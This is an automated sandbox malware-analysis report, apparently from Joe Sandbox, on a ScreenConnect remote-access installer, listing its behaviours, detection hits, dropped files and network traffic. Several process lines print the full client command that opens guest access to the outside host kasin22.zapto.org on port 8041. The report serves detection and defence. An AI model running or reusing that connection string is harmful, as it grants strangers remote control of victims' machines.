Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1557086
MD5: 093b0062fbf8663736ced8f41859ff58
SHA1: 20b26d4cc9e13c560bc1e86920f5965291cc4d7a
SHA256: 64ca91a2446a8e567b24deea926bbdb34fd2dda221577787bbb62d07cbf0272d
Tags: exe, user-Bitsight
Infos:

Detection

ScreenConnect Tool
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • file.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 093B0062FBF8663736CED8F41859FF58)
    • msiexec.exe (PID: 4512 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 2096 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6488 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A716AADF688D387F4AEB51767417B70D C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 716 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 3820 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 62F8343635E97A7D5BEDC1A49E3625BE MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 5256 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3CDFD6ECE8056A2339D8E63B556C7FE0 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 2448 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4180 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "60081e8a-4d58-45ec-97b7-8f04b030d7f4" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 6196 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "355be41b-df8e-4504-845b-0f4583aafa5e" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Config.Msi\5de52c.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Installer\MSIE7CB.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000002.2163119833.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
9.2.ScreenConnect.WindowsClient.exe.2c6fa28.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
9.0.ScreenConnect.WindowsClient.exe.950000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.file.exe.5af0000.8.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.file.exe.5af0000.8.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.0.file.exe.ad5db8.2.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                              System Summary

                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" 
"?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=", ProcessId: 2448, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (e6cb77284cf765aa) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 2096, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\(Default)
                              No Suricata rule has matched

                              AV Detection

                              Source: file.exe, Virustotal: Detection: 26%
                              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.7% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, Code function: 8_2_05BF0B51 CryptUnprotectData,8_2_05BF0B51
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, Code function: 8_2_05BF0AA0 CryptUnprotectData,8_2_05BF0AA0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, Code function: 8_2_05BF0A99 CryptUnprotectData,8_2_05BF0A99
                              Source: C:\Users\user\Desktop\file.exe, EXE: msiexec.exe

                              Compliance

                              Source: C:\Users\user\Desktop\file.exe, EXE: msiexec.exe
                              Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: file.exe, Static PE information: certificate valid
                              Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: file.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: file.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250157916.000000001BD62000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250038149.000000001BD20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: file.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2185677970.0000000000B0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2160635976.0000000004B50000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: file.exe, MSIE7CB.tmp.3.dr, MSIE7EB.tmp.3.dr, MSIEC9F.tmp.3.dr, setup.msi.0.dr, 5de52c.rbs.3.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: file.exe, MSIE114.tmp.2.dr, setup.msi.0.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: file.exe
                              Source: C:\Windows\System32\msiexec.exe, File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:

                              Networking

                              Source: C:\Windows\System32\msiexec.exe, Registry value created: NULL Service
                              Source: global traffic, TCP traffic: 192.168.2.6:49714 -> 194.59.30.222:8041
                              Source: Joe Sandbox View, ASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic, DNS traffic detected: DNS query: kasin22.zapto.org
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.3393549461.0000000001CB3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                              System Summary

                              Source: file.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_055B03D0 CreateProcessAsUserW
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5de52b.msi
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{C65824D8-9903-AFB4-B430-141024FF968F}
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE7CB.tmp
